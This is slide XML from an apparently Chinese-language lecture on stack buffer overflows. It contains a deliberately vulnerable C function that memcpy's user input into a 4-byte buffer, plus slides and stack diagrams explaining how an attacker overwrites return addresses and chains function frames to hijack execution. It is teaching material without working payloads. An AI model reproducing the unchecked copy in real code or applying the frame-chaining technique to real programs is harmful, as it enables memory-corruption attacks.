            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="900" b="1" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> 2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>get_buff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>(char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>user_input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> 3.   char buff[4];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1100" b="1" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> 4.   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>memcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>(buff, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>user_input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>strlen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>user_input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>)+1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> 5.   return 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> 6. }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1100" b="1" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> 7. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> main(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>, char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>[]){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> 8.   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>get_buff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>[1]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> 9.   return 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>10. }</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="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47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28458562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dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>漏洞利用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57347" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>用存在的函数地址覆写返回地址</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>创建栈帧来链接函数调用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>再现原始帧返回的程序，不进行检测并恢复执行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="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48</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31709008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a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>缓冲区溢出之前及之后的栈</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58371" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="27114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ebp (frame 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58372" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="30162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address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58373" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="33210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(leave/ret)address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58374" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="36099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argptr</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58375" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="39147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f() arg data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58376" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="42195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ebp (frame 3)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58377" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="45243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g()address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58378" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="48291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(leave/ret)address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58379" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="51339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 argptr</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58380" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="54387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g() arg data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58381" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="60642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return addr(main)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58382" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="57594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ebp (orig)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58383" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="24066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buff[4]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="58384" name="AutoShape 16"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="58374" idx="1"/>
            <a:endCxn id="58375" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1" flipV="1">
            <a:off x="5029200" y="3762375"/>
            <a:ext cx="1588" cy="304800"/>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58385" name="Text Box 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7740650" y="31384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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58386" name="Text Box 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7772400" y="47386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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58387" name="Text Box 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7620000" y="5759450"/>
            <a:ext cx="9715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Original</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>Frame</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="58388" name="AutoShape 20"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="58371" idx="3"/>
            <a:endCxn id="58376" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="2863850"/>
            <a:ext cx="1588" cy="1508125"/>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58389" name="AutoShape 21"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="58376" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1" flipV="1">
            <a:off x="5029200" y="4371975"/>
            <a:ext cx="1588" cy="1524000"/>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58390" name="Line 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="42052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8391" name="Line 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="57292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8392" name="Line 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="26812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8393" name="Line 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7391400" y="6369050"/>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8394" name="Text Box 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4114800" y="2362200"/>
            <a:ext cx="593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esp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="58395" name="AutoShape 27"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:endCxn id="58383" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4676775" y="2559050"/>
            <a:ext cx="3524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58396" name="AutoShape 28"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4648200" y="2952750"/>
            <a:ext cx="352425" cy="158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8397" name="Text Box 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4083050" y="2725738"/>
            <a:ext cx="593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ebp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58398" name="Text Box 30"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1458913" y="2330450"/>
            <a:ext cx="185737"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endParaRPr lang="en-US" altLang="zh-CN">
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58399" name="Rectangle 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1098550" y="2741613"/>
            <a:ext cx="251460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ebp (main)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58400" name="Rectangle 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1098550" y="3016250"/>
            <a:ext cx="251460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return addr(main)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58401" name="Rectangle 33"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1098550" y="2438400"/>
            <a:ext cx="251460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buff[4]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58402" name="Text Box 34"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="2406650"/>
            <a:ext cx="593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esp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58403" name="Text Box 35"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="2711450"/>
            <a:ext cx="593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ebp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58404" name="Rectangle 36"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1098550" y="3321050"/>
